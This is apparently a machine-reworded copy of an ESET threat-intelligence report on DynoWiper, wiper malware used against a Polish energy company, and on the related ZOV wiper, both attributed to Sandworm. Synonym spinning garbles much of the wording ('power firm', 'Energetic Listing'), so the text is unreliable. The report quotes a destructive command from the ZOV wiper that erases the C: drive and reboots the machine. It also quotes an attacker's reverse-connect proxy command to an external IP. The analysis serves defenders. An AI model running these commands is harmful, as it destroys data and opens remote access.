Sample Page Title

On this weblog put up, we offer extra technical particulars associated to our earlier DynoWiper publication.

Key factors of the report:

• ESET researchers recognized new data-wiping malware that now we have named DynoWiper, used in opposition to an power firm in Poland.
• The techniques, methods, and procedures (TTPs) noticed through the DynoWiper incident intently resemble these seen earlier this 12 months in an incident involving the ZOV wiper in Ukraine: Z, O, and V are Russian army symbols.
• We attribute DynoWiper to Sandworm with medium confidence, in distinction to the ZOV wiper, which we attribute to Sandworm with excessive confidence.

Sandworm profile

Sandworm is a Russia-aligned risk group that performs damaging assaults. It’s largely recognized for its assaults in opposition to Ukrainian power firms in 2015-12 and 2016-12, which resulted in energy outages. In 2017-06 Sandworm launched the NotPetya data-wiping assault that used a supply-chain vector by compromising the Ukrainian accounting software program M.E.Doc. In 2018-02, Sandworm launched the Olympic Destroyer data-wiping assault in opposition to organizers of the 2018 Winter Olympics in Pyeongchang.

The Sandworm group makes use of such superior malware as Industroyer, which is ready to talk with tools at power firms by way of industrial management protocols. In 2022-04, CERT-UA thwarted an assault in opposition to an power firm in Ukraine the place the Sandworm group tried to deploy a brand new variant of this malware, Industroyer2.

In 2020-10, the US Division of Justice revealed an indictment in opposition to six Russian laptop hackers that it alleges ready and performed numerous Sandworm assaults. The group is usually attributed to Unit 74455 of the Russian Foremost Intelligence Directorate (GRU).

Historical past of Sandworm’s damaging operations

Sandworm is a risk actor recognized for conducting damaging cyberattacks, focusing on a variety of entities together with authorities companies, logistics firms, transportation corporations, power suppliers, media organizations, grain sector firms, and telecommunications firms. These assaults usually contain the deployment of wiper malware – malicious software program designed to delete recordsdata, erase knowledge, and render programs unbootable.

Its operators have a protracted historical past of conducting such cyberattacks, and now we have documented their exercise extensively. On this blogpost, we deal with their current operations involving data-wiping malware.

To evade detections by safety merchandise, Sandworm usually modifies the damaging malware it deploys – typically by introducing minor adjustments or by producing newly compiled variants from the unique supply code, and different occasions by abandoning a specific wiper altogether and switching to a wholly new malware household for its operations. We hardly ever see Sandworm try to deploy a damaging malware pattern that was utilized in an earlier assault (for instance, one with a recognized hash) or one that’s already detected on the time of deployment.

Since February 2022, now we have been completely monitoring incidents involving damaging malware and have publicly documented our findings in experiences similar to A 12 months of wiper assaults in Ukraine. Over time, Sandworm has deployed a variety of damaging malware households, together with, in roughly chronological order, HermeticWiper, HermeticRansom, CaddyWiper, DoubleZero, ARGUEPATCH, ORCSHRED, SOLOSHRED, AWFULSHRED, Status ransomware, RansomBoggs ransomware, SDelete-based wipers, BidSwipe, ROARBAT, SwiftSlicer, NikoWiper, SharpNikoWiper, ZEROLOT, Sting wiper, and ZOV wiper. It ought to be famous that a few of these malware households had been deployed a number of occasions throughout quite a lot of incidents. In 2025, ESET investigated greater than 10 incidents involving damaging malware attributed to Sandworm, virtually all of them occurring in Ukraine.

We constantly improve our merchandise to enhance early detection of Sandworm operations – ideally figuring out exercise earlier than damaging wipers are deployed, and each time doable stopping injury even when beforehand unknown damaging malware is executed. As a result of the vast majority of Sandworm’s cyberattacks at present goal Ukraine, we collaborate intently with our Ukrainian companions, together with the Laptop Emergency Response Crew of Ukraine (CERT-UA), to help each prevention and remediation efforts.

Apart from Ukraine, Sandworm has a decade-long historical past of focusing on firms in Poland, together with these within the power sector. Sometimes, these operations have been performed covertly for cyberespionage functions, as seen within the BlackEnergy and GreyEnergy instances. Notably, we detected the primary deployment of GreyEnergy malware at a Polish power firm again in 2015.

Nevertheless, because the begin of Russia’s full-scale invasion of Ukraine, Sandworm has modified its techniques concerning targets in Poland. Particularly, in October 2022, it carried out a damaging assault in opposition to logistics firms in each Ukraine and Poland, disguising the operation as a Status ransomware incident. Microsoft Menace Intelligence reported on the Status ransomware incidents, which they attributed to Seashell Blizzard (aka Sandworm). At ESET, we detected the Status ransomware household and publicly attributed this exercise to Sandworm.

In December 2025, we detected the deployment of a damaging malware pattern, which we named DynoWiper, at an power firm in Poland. The put in EDR/XDR product, ESET PROTECT, blocked execution of the wiper, considerably limiting its impression within the atmosphere. On this blogpost, we reveal further particulars about this exercise and description our attribution course of.

CERT Polska did a wonderful job investigating the incident and revealed an in depth evaluation in a report out there on its web site.

DynoWiper

On December 29^th, 2025, DynoWiper samples had been deployed to the C:inetpubpub listing, which is probably going a shared listing within the sufferer’s area, with the next filenames: schtask.exe, schtask2.exe, and <redacted>_update.exe. The schtask*.exe samples comprise the PDB path C:UsersvagrantDocumentsVisual Studio 2013ProjectsSourceReleaseSource.pdb. The username vagrant corresponds to a software referred to as Vagrant, which can be utilized to handle digital machines. This implies that the machine that was used to construct the wiper is a Vagrant field or, extra seemingly, a number system that manages digital machines utilizing Vagrant. It’s due to this fact doable that Sandworm operators first examined the operation on digital machines earlier than deploying the malware within the goal group.

The attackers initially deployed <redacted>_update.exe (PE timestamp: 2025‑12‑26 13:51:11). When this try failed, they modified the wiper code, constructed it, after which deployed schtask.exe (PE timestamp: 2025‑12‑29 13:17:06). This try additionally appears to have been unsuccessful, so that they rebuilt the wiper with barely modified code, leading to schtask2.exe (PE timestamp: 2025‑12‑29 14:10:07). It’s seemingly that even this closing try failed. All three samples had been deployed on the identical day – December 29^th, 2025. ESET PROTECT was put in on the focused machines and seems to have interfered with the execution of all three variants.

DynoWiper’s workflow might be divided into three distinct phases, that are described later within the textual content. The schtask*.exe samples embrace solely the primary two phases and introduce a five-second delay between them. In distinction, <redacted>_update.exe implements all three phases and doesn’t embrace the five-second delay.

The wiper overwrites recordsdata utilizing a 16-byte buffer that accommodates random knowledge generated as soon as at the beginning of the wiper’s execution. Recordsdata of dimension 16 bytes or fewer are totally overwritten, with smaller recordsdata being prolonged to 16 bytes. To hurry up the destruction course of, different recordsdata (bigger than 16 bytes) have just some elements of their contents overwritten.

In the course of the first part, the malware recursively wipes recordsdata on all detachable and stuck drives, excluding particular directories (utilizing case-insensitive comparability):

• system32
• home windows
• program recordsdata
• program recordsdata(x86) (an area is lacking earlier than the open bracket)
• temp
• recycle.bin
• $recycle.bin
• boot
• perflogs
• appdata
• paperwork and settings

For <redacted>_update.exe and schtask.exe, the second part behaves equally, however this time the beforehand excluded directories usually are not skipped within the root listing (e.g., C:). Because of this, a path like C:Home windows is now not excluded, whereas C:WindowsSystem32 nonetheless is. For schtask2.exe, within the second part, all recordsdata and directories on detachable and stuck drives are eliminated by way of the DeleteFileW API with out skipping any directories, and with out overwriting recordsdata.

The third part forces the system to reboot, finishing the destruction of the system.

In contrast to Industroyer and Industroyer2, the found DynoWiper samples focus solely on the IT atmosphere, with no noticed performance focusing on OT (operational expertise) industrial parts. Nevertheless, this doesn’t exclude the chance that such capabilities had been current elsewhere within the assault chain.

Different instruments deployed

We recognized further instruments used inside the similar community previous to deployment of the wiper.

In early phases of the assault, attackers tried to obtain the publicly out there Rubeus software. The next path was used: c:customers<USERNAME>downloadsrubeus.exe.

In early December 2025, attackers tried to dump the LSASS course of utilizing Home windows Job Supervisor. Moreover, they tried to obtain and launch a publicly out there SOCKS5 proxy software referred to as rsocx. The attackers tried to execute this proxy in reverse-connect mode utilizing the command line C:Customers<USERNAME>Downloadsr.exe -r 31.172.71[.]5:8008. This server is utilized by ProGame (progamevl[.]ru), a programming faculty for teenagers in Vladivostok, Russia, and was seemingly compromised.

ZOV wiper

We recognized a number of similarities to beforehand recognized damaging malware, particularly to the wiper now we have named ZOV, which we attribute to Sandworm with excessive confidence. DynoWiper operates in a broadly comparable trend to the ZOV wiper. Notably, the exclusion of sure directories and particularly the clear separate logic current within the code for wiping smaller and bigger recordsdata can be discovered within the ZOV wiper.

ZOV is damaging malware that we detected being deployed in opposition to a monetary establishment in Ukraine in November 2025.

As soon as executed, the ZOV wiper iterates over recordsdata on all fastened drives and wipes them by overwriting their contents. It skips recordsdata in these directories:

• $Recycle.Bin
• AppData
• Software Knowledge
• Program Recordsdata
• Program Recordsdata (x86)
• Temp
• Home windows
• Home windows.previous

How a file is wiped relies on its dimension. To destroy knowledge as rapidly as doable, recordsdata smaller than 4,098 bytes have their whole contents overwritten; bigger recordsdata have just some elements of their contents overwritten. The buffer, which is repeatedly written to recordsdata, is of dimension 4,098 bytes, and begins with the string ZOV (referring to the Russian army symbols) adopted by null bytes.

After finishing this fast wipe, it prints what number of directories and recordsdata had been wiped, and runs the shell command time /t & ver & rmdir C: /s /q && dir && shutdown /r (print present native time and Home windows model, erase the contents of the C: drive, record the present working listing, and initiates a system reboot).

Proper earlier than exiting, the wiper drops a picture from its sources to %appdatapercentLocWall.jpg and units it because the desktop background. As proven in Determine 1, the wallpaper additionally has the ZOV image.

There was one other ZOV wiper case at an power firm in Ukraine, the place the attackers deployed the wiper on January 25^th, 2024. Within the noticed pattern, the buffer that’s written to recordsdata doesn’t comprise the ZOV image. As an alternative, it accommodates the only character P adopted by null bytes. Additionally, the textual content within the dropped picture (see Determine 2) resembles a ransom be aware however refers to a nonexistent Bitcoin deal with.

Damaging malware deployment strategies

Sandworm usually abuses Energetic Listing Group Coverage to deploy its data-wiping malware throughout all machines inside a compromised community. Group-wide GPO deployment usually requires Area Admin privileges and is usually staged from a website controller. This exercise underscores Sandworm’s sophistication and its confirmed skill to acquire high-privilege Energetic Listing entry throughout many intrusions.

In the course of the incident response to the Industroyer2 assault in April 2022, CERT‑UA found a PowerShell script they named POWERGAP. Sandworm had been utilizing this script incessantly to deploy numerous data-wiping malware throughout a number of organizations. Later, in November 2022, ESET researchers discovered that the identical script had been used to distribute the RansomBoggs ransomware in Ukraine. Nevertheless, sooner or later Sandworm stopped utilizing this deployment script, but continued deploying damaging malware by way of Energetic Listing Group Coverage.

Apparently, through the evaluation of the ZOV wiper incident, we recognized a more recent PowerShell script used to deploy the ZOV wiper. This script accommodates hardcoded variables particular to the sufferer’s atmosphere, together with the area controller title, area title, Group Coverage Object (GPO) title, deployed filename, file path, GPO hyperlink string, and scheduled job title. As soon as executed, the script performs all needed actions to distribute the malicious binary to customers and computer systems throughout the complete area.

Extra considerably, a deployment script with very comparable performance, however with out robust code similarity, was found getting used to deploy the DynoWiper malware in a Polish power firm. In that case, nevertheless, the malicious binary was not distributed to particular person computer systems however was as an alternative executed instantly from a shared community listing.

As talked about above, operations of this data-wiping nature generally require a risk actor to own Area Admin privileges. As soon as a risk actor reaches this degree of entry, defending the atmosphere turns into extraordinarily troublesome, as they will carry out practically any motion inside the area. Some organizations, notably within the power sector, additionally deliberately phase or isolate elements of their IT/OT environments to satisfy operational and security necessities. Whereas this isolation might be an acceptable risk-management selection, it usually reduces defender visibility and might sluggish proof assortment and response workflows, which in flip can complicate incident investigation and end in lower-confidence attribution.

Attribution

We attribute DynoWiper to Sandworm with medium confidence. The next components help our evaluation:

• There’s a robust overlap between the TTPs noticed on this exercise and people usually related to Sandworm operations. Particularly, using data-wiping malware and its deployment by way of Energetic Listing Group Coverage are each methods generally employed by Sandworm. As described above, we recognized similarities in each the wipers used and the Group Coverage deployment script when evaluating this case to earlier Sandworm exercise.
• The focused trade aligns with Sandworm’s typical pursuits. This group incessantly targets power firms and has a confirmed monitor file of attacking OT environments.
• Traditionally, Sandworm has focused Polish power firms for cyberespionage functions, utilizing the BlackEnergy and GreyEnergy malware households.
• We aren’t conscious of every other lately energetic risk actors which have used data-wiping malware of their operations in opposition to targets in European Union international locations.

The next components contradict a Sandworm attribution:

Though Sandworm has beforehand focused firms in Poland, it usually did so covertly – both for cyberespionage functions solely or by disguising its data-wiping exercise as a ransomware assault, similar to within the Status ransomware incidents. It’s price noting that we solely attribute the data-wiping part of this exercise to Sandworm with medium confidence. We do not need visibility into the preliminary entry methodology used on this incident and due to this fact can’t assess how or by whom the primary steps had been carried out. Specifically, the preparatory phases main as much as the damaging exercise could have been performed by one other risk actor group collaborating with Sandworm. Notably, in 2025 we noticed and confirmed that the UAC‑0099 group performed preliminary entry operations in opposition to targets in Ukraine and subsequently handed off validated targets to Sandworm for follow-up exercise.

Conclusion

This incident represents a uncommon and beforehand unseen case through which a Russia-aligned risk actor deployed damaging, data-wiping malware in opposition to an power firm in Poland.

For any inquiries about our analysis revealed on WeLiveSecurity, please contact us at threatintel@eset.com. 

ESET Analysis presents personal APT intelligence experiences and knowledge feeds. For any inquiries about this service, go to the ESET Menace Intelligence web page.

IoCs

Community

MITRE ATT&CK methods

This desk was constructed utilizing model 18 of the MITRE ATT&CK framework.